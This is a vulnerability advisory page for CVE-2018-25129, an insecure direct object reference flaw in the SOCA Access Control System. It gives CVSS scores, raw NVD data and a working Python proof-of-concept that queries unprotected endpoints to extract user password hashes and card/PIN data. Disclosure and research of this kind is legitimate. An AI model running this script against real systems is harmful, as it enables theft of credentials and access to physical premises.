Security Vulnerability Report
中文
CVE-2018-25129 CVSS 7.5 HIGH

CVE-2018-25129

Published: 2025-12-24 20:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

SOCA Access Control System 180612 contains multiple insecure direct object reference vulnerabilities that allow attackers to access sensitive user credentials. Attackers can retrieve authenticated and unauthenticated user password hashes and pins through unprotected endpoints like Get_Permissions_From_DB.php and Ac10_ReadSortCard.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SOCA Access Control System 180612

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2018-25129 PoC - SOCA Access Control System IDOR # Exploit for retrieving user password hashes via unprotected endpoints import requests import sys import re target_url = "http://target.com/" def exploit_get_permissions(): """Exploit Get_Permissions_From_DB.php endpoint""" endpoint = f"{target_url}Get_Permissions_From_DB.php" # IDOR: Change user_id parameter to enumerate users params = {"user_id": "1"} # Can be modified to target other users try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: # Extract password hash from response hash_match = re.search(r'[a-fA-F0-9]{32,}', response.text) if hash_match: return hash_match.group(0) except Exception as e: print(f"Error: {e}") return None def exploit_read_sort_card(): """Exploit Ac10_ReadSortCard endpoint""" endpoint = f"{target_url}Ac10_ReadSortCard" # IDOR: Direct access to card data without authorization params = {"card_id": "1"} # Modify to enumerate cards try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: return response.text except Exception as e: print(f"Error: {e}") return None if __name__ == "__main__": print("[*] CVE-2018-25129 PoC - SOCA Access Control System IDOR") print("[*] Target:", target_url) print("\n[1] Attempting to retrieve password hash...") password_hash = exploit_get_permissions() if password_hash: print(f"[!] Found password hash: {password_hash}") print("\n[2] Attempting to retrieve card/PIN data...") card_data = exploit_read_sort_card() if card_data: print(f"[!] Found card data: {card_data[:200]}...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25129", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:46.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOCA Access Control System 180612 contains multiple insecure direct object reference vulnerabilities that allow attackers to access sensitive user credentials. Attackers can retrieve authenticated and unauthenticated user password hashes and pins through unprotected endpoints like Get_Permissions_From_DB.php and Ac10_ReadSortCard."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "http://www.socatech.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46832", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.